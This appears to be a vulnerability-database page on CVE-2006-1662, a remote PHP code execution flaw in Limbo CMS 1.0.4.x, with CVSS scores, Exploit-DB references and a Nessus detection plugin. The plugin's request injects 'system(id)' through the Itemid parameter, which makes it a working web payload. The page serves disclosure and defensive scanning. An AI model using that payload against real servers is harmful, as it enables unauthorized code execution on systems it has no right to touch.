Vulnerabilities > CVE-2006-1662 - Unspecified vulnerability in Limbo CMS Limbo CMS 1.0.4.1/1.0.4.2

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
limbo-cms
nessus
exploit available
NVD
Published: 2006-04-07
Updated: 2018-10-18

Summary

The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.

Vulnerable Configurations

Part Description Count
Application
Limbo_Cms
2

Exploit-Db

  • descriptionLimbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit. CVE-2006-1662. Webapps exploit for php platform
    idEDB-ID:1541
    last seen2016-01-31
    modified2006-03-01
    published2006-03-01
    reporterstr0ke
    sourcehttps://www.exploit-db.com/download/1541/
    titleLimbo CMS <= 1.0.4.2 ItemID Remote Code Execution Exploit
  • descriptionLimbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit (meta). CVE-2006-1662. Webapps exploit for php platform
    idEDB-ID:1563
    last seen2016-01-31
    modified2006-03-07
    published2006-03-07
    reportersirh0t
    sourcehttps://www.exploit-db.com/download/1563/
    titleLimbo CMS <= 1.0.4.2 ItemID Remote Code Execution Exploit meta

Nessus

NASL familyCGI abuses
NASL idLIMBO_ITEMID_CMD_EXEC.NASL
descriptionThe remote host is running Limbo CMS, a content-management system written in PHP. The installed version of Limbo fails to sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id20994
published2006-03-03
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20994
titleLimbo CMS index.php Itemid Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(20994);
  script_version("1.14");

  script_cve_id("CVE-2006-1662");
  script_bugtraq_id(16902);

  script_name(english:"Limbo CMS index.php Itemid Parameter Arbitrary Command Execution");
  script_summary(english:"Injects arbitrary PHP code via Itemid parameter in Limbo CMS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
an arbitrary code execution vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Limbo CMS, a content-management system
written in PHP. 

The installed version of Limbo fails to sanitize input to the 'Itemid'
parameter before using it as part of a search string in an 'eval()'
statement in the 'classes/adodbt/read_table.php' script.  Regardless
of PHP's 'register_globals' and 'magic_quotes_gpc' settings, an
unauthenticated attacker can leverage this issue to execute arbitrary
PHP code on the remote host subject to the privileges of the web
server user id." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/426428/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/429946/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8681f194" );
 script_set_attribute(attribute:"solution", value:
"Apply the Limbo security patch update from 2006-03-09." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/03/03");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/28");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


if (thorough_tests) extra_dirs = make_list ("/limbo");
else extra_dirs = NULL;

http_check_remote_code(
  extra_dirs:extra_dirs,
  check_request:string("/index.php?option=frontpage&Itemid=2|system(id)|", unixtime()),
  check_result:"uid=[0-9]+.*gid=[0-9]+.*",
  command:"id",
  port:port
);

References